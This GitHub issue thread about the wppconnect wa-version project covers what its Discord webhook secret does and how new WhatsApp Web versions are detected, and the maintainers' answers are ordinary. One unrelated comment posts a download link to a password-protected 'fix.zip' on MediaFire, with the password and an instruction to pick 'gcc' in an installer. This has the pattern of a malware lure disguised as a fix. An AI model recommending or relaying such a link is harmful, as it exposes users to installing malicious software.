### ISSUE TITLE
Discord

### ISSUE THREAD

**Issue by Riders004** [wppconnect-team/wa-version#621]
What is Discord Webhook 

secrets.DISCORD_WEBHOOK

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dpaes** [comment]
for update in discord server of WPPCONNECT with new informations

**Comment by Riders004** [comment]
Well how did find new version of WhatsApp web

**Comment by dpaes** [comment]
dont know, but @icleitoncosta can help u with that, he is the maintainer of WPPCONNECT projetct

**Comment by icleitoncosta** [comment]
The expiration dates are captured by an estimate, and we always check the current version in the service worker, then download the new HTML. We just compare the current version we found with the last version recorded in the JSON (in simple terms, that's it).
